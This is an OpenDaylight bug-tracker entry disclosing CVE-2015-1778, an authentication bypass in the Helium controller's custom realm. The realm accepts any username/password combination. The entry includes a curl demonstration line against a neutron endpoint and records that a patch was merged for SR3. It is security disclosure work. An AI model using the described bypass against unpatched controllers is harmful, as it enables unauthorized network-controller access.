[CONTROLLER-1187] [SECURITY] Authentication bypass in opendaylight realm CVE-2015-1778 Created: 09/Mar/15 Updated: 14/Mar/15 Resolved: 14/Mar/15 |
|
| Status: | Resolved |
| Project: | controller |
| Component/s: | usermanager |
| Affects Version/s: | Helium |
| Fix Version/s: | None |
| Type: | Bug | ||
| Reporter: | David Jorm | Assignee: | David Jorm |
| Resolution: | Done | Votes: | 0 |
| Labels: | None | ||
| Remaining Estimate: | Not Specified | ||
| Time Spent: | Not Specified | ||
| Original Estimate: | Not Specified | ||
| Environment: |
Operating System: All |
||
| External issue ID: | 2798 |
| Priority: | Highest |
| Description |
|
Flavio Fernandes reported: Today on Helium (including SR1.1 and SR2) the neutron northbound uses basicAuth. While the rest server (port 8080) will reject an http w/out the auth header, it does not Quick way of demonstrating this: curl http://192.168.50.1:8080/controller/nb/v2/neutron/networks <== 401, correct Please make sure that security issue is taken care of. Note this is not an issue in Lithium codebase, once we changed to jetty. I did not try Hydrogen. David Jorm investigated and found the offending code: This will accept any username/password combination. If I change line 40 to "return null;" and recompile, then no username/password combination is accepted. It appears that the "opendaylight" realm (which uses this custom realm class) is widely used by several interfaces. I think a patch should drop the custom realm class and use UserDatabaseRealm or similar instead. Colin Dixon is now working on a patch, targeting the SR3 release. |
| Comments |
| Comment by David Jorm [ 11/Mar/15 ] |
|
Proposed patch for stable/helium: https://git.opendaylight.org/gerrit/#/c/16307/ |
| Comment by David Jorm [ 14/Mar/15 ] |
|
The patch has been merged, and will be included in the SR3 release. |